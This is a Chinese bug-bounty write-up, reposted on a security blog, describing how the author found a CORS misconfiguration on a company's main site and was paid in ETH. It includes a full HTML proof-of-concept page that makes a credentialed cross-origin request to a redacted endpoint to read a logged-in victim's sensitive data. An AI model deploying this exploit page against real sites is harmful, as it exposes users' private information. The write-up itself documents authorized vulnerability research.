cors漏洞来袭–一次财大气粗的src主站两千两百元的捡漏

护网的时候闲的没事干,我这条咸鱼也开始挖某财大气粗的src
懒得找什么子域名,小程序app,先看主站,xray被动一开,就报有cors漏洞,这种漏洞想要有危害,就是要找一个敏感接口并且此接口正好有cors配置不当
举例

  1. 假设用户登陆一个含有CORS配置网站foo.com,同时又访问了攻击者提供的一个链接evil.com。

    2.evil.com的网站向foo.com这个网站发起请求获取敏感数据,浏览器能否接收信息取决于foo.com的配置。

3.如果foo.com配置了Access-Control-Allow-Origin头且为预期,那么允许接收,反之浏览器会因为同源策略而不接收。

登陆后,因为不同的cookie,可以只看到自己的个人信息,敏感信息等,当攻击者用这个接口,生成cors的漏洞exp后,引诱登陆状态下的受害者点击此exp,则攻击者就可以任意浏览受害者的敏感信息

测了一下,发现全站都有cors,那现在的任务就是找到一处能获得敏感信息的接口,翻bp历史,终于找到一处
图片[1]-cors漏洞来袭–一次财大气粗的src主站两千两百元的捡漏-安全小天地
可见此处,有cors配置不当,而且返回敏感信息
构造exp:a.html,放到自己的服务器中
图片[2]-cors漏洞来袭–一次财大气粗的src主站两千两百元的捡漏-安全小天地
然后,在网站浏览器登陆的状态下访问该页面http://xxxx/a.html
模拟攻击者给受害者发送该页面,从而获取受害者的信息
图片[3]-cors漏洞来袭–一次财大气粗的src主站两千两百元的捡漏-安全小天地
漏洞利用代码:
<!DOCTYPE html>

<html>

<body>

<center>

<h2>CORS POC Exploit</h2>

<h3>Extract SID</h3>

<div id=”demo”>

<button type=”button” onclick=”cors()”>Exploit</button>

</div>

<script>

function cors() {

var xhttp = new XMLHttpRequest();

xhttp.onreadystatechange = function() {

if (this.readyState == 4 && this.status == 200) {

document.getElementById(“demo”).innerHTML = alert(this.responseText);

}

};

xhttp.open(“GET”, “https://xxxxx/xxx/xxx/xxxxx?platform=web“, true);

xhttp.withCredentials = true;

xhttp.send();

}

</script>

</body>

</html>

该src评价
图片[4]-cors漏洞来袭–一次财大气粗的src主站两千两百元的捡漏-安全小天地
0.12eth币,我四月份卖的,当时eth价格是一万九,卖了大概2200,成功捡漏
图片[5]-cors漏洞来袭–一次财大气粗的src主站两千两百元的捡漏-安全小天地
后话:全卖了过了十天,eth涨到两万七。。。微笑.jpg

文字来源于- 火线 Zone-云安全社区,安全小天地只做文章分享,如有侵权,请联系站长删除


「渗透云记」公众号里主要记录我每天的所思所想,我会坚持更新质量不错的文章,感兴趣的小伙伴可以扫描下方二维码,谢谢支持! 安全小天地 - 公众号 - 渗透云记
© 版权声明
THE END
喜欢就支持一下吧
点赞10 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容